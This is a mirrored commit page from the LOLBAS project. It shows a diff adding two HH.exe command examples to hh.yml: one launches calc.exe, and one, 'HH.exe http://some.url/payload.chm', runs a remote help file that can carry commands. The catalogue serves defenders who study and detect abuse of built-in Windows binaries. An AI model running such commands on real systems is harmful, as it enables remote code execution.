mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Fixing issue with hh.yml
This commit is contained in:
parent
089614e6a9
commit
b46fc3f8c2
@ -14,6 +14,8 @@ Commands:
|
|||||||
Tags:
|
Tags:
|
||||||
- Execute: EXE
|
- Execute: EXE
|
||||||
- Application: GUI
|
- Application: GUI
|
||||||
|
- Command: HH.exe c:\windows\system32\calc.exe
|
||||||
|
Description: Executes calc.exe with HTML Help.
|
||||||
Usecase: Execute process with HH.exe
|
Usecase: Execute process with HH.exe
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -22,6 +24,7 @@ Commands:
|
|||||||
Tags:
|
Tags:
|
||||||
- Execute: EXE
|
- Execute: EXE
|
||||||
- Application: GUI
|
- Application: GUI
|
||||||
|
- Command: HH.exe http://some.url/payload.chm
|
||||||
Description: Executes a remote payload.chm file which can contain commands.
|
Description: Executes a remote payload.chm file which can contain commands.
|
||||||
Usecase: Execute commands with HH.exe
|
Usecase: Execute commands with HH.exe
|
||||||
Category: Execute
|
Category: Execute
|
||||||
|
Loading…
Reference in New Issue
Block a user